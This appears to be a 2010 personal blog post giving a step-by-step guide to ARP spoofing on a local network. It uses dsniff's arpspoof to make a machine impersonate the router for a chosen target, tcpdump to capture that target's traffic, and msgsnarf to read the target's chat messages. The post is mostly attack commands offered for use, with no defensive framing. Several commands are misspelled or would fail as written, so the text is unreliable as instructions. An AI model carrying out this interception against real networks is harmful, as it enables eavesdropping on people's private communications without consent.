Saturday 28 August 2010

arp spoofing

here i'l try to describe how to do an arp spoofing and sniff the traffic
my main idea is to make my pc pretend to be the router and get the traffic of a specific pc
Operating system used: ubuntu
Software used : arpsppf (dsniff package), and tcpdump

1- download the dsniff package
sudo apt-get dsniff

2- allow forwarding of the traffic so target pc will not fail to communicate
sudo echo 1 > /proc/sys/net/ipv4/ip_forward

3- start arp spoofing to target_ip and pretend to be router_ip
sudo arpsppof -i interfacename -t target_ip router_ip
example:
sudo arpsppof -i wlan0 -t 192.168.1.10 192.168.1.1

4- start tcpdump to see traffic
tcpdump -ni wlan0 host 192.168.1.10

now we get the traffic from the target_ip (192.168.1.10)

further we can use tools to sniff data
- for chating programs like yahoo and msn use msgsnarf (dsniff package)

Welcome to my blog

hello all
i like network security and programming
so i'll try here to add as much information i know as i can
to be as information reference
please feel free to contact me or send information to add
thank you